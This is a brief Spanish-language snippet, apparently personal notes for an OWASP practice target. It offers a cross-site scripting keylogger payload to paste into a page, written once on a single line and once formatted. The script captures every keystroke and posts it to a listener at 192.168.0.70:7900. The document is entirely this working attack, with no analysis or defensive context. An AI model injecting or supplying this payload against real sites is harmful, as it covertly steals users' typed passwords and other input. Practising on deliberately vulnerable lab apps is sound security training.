Linea para pegar en owasp 
<script type="text/javascript">var l = "";document.onkeypress = function (e) {l += e.key;var req = new XMLHttpRequest();req.open("POST","http://192.168.0.70:7900/", true);req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");req.send("data=" + l);}</script>

Mismo codigo mas prolijo
 <script type="text/javascript">
    var l = "";  

    document.onkeypress = function (e) {
        l += e.key;
        var req = new XMLHttpRequest();
        req.open("POST","http://192.168.0.70:7900/", true); 			
        req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        req.send("data=" + l);
    }
</script>


